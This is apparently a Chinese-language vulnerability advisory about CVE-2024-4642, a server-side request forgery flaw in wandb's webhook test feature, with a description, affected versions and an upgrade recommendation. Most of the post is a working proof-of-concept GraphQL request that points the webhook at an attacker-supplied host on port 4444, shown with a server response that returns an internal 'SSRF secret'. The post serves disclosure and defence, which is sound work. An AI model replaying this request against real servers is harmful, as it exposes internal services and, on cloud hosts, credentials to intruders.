【漏洞预警】wandb信息泄露漏洞(CVE-2024-4642)

cexlife 飓风网络安全 2024-05-17 17:02

漏洞描述:

由于HTTP302重定向处理不当,ԝаndb/ԝаndb存储库中存在服务端请求伪造(SSRF)漏洞,此问题允许有权访问’Uѕеr ѕеttinɡѕ->Wеbhооkѕ’函数的团队成员利用该漏洞访问内部HTTP(ѕ)服务器,在严重的情况下,例如在ＡWS实例上,这可能会被滥用以在受害者的机器上实现远程代码执行,该漏洞存在于最新版本的存储库中。

POST /graphql HTTP/1.1Host: ip:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: http://ip:8080/settingscontent-type: application/jsonX-Origin: http://ip:8080Content-Length: 572Origin: http://ip:8080Connection: close{“operationName”:”TestGenericWebhookIntegration”,”variables”:{“entityName”:”test”,”urlEndpoint”:”http://{your-IP}:4444″,”requestPayload”:”{\n\n\n\n\n}”},”query”:”mutation TestGenericWebhookIntegration($entityName: String!, $urlEndpoint: String!, $accessTokenRef: String, $secretRef: String, $requestPayload: JSONString) {\n  testGenericWebhookIntegration(\n    input: {entityName: $entityName, urlEndpoint: $urlEndpoint, accessTokenRef: $accessTokenRef, secretRef: $secretRef, requestPayload: $requestPayload}\n  ) {\n    ok\n    response\n    __typename\n  }\n}\n”}HTTP/1.1 200 OKServer: nginxDate: Mon, 18 Mar 2024 14:48:04 GMTContent-Type: application/json; charset=utf-8Content-Length: 201Connection: closeVary: OriginX-Content-Type-Options: nosniffX-Ratelimit-Limit: 1000X-Ratelimit-Remaining: 1000Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0{“data”:{“testGenericWebhookIntegration”:{“ok”:true,”response”:”{\”response\”:\”\u003ch1\u003eSSRF secret\u003c/h1\u003e\n\”,\”error\”:\”\”}”,”__typename”:”TestGenericWebhookIntegrationPayload”}}}影响产品:

wandb/wandb<=latest 修复解决方案:目前官方已有可更新版本,建议受影响用户升级至最新版本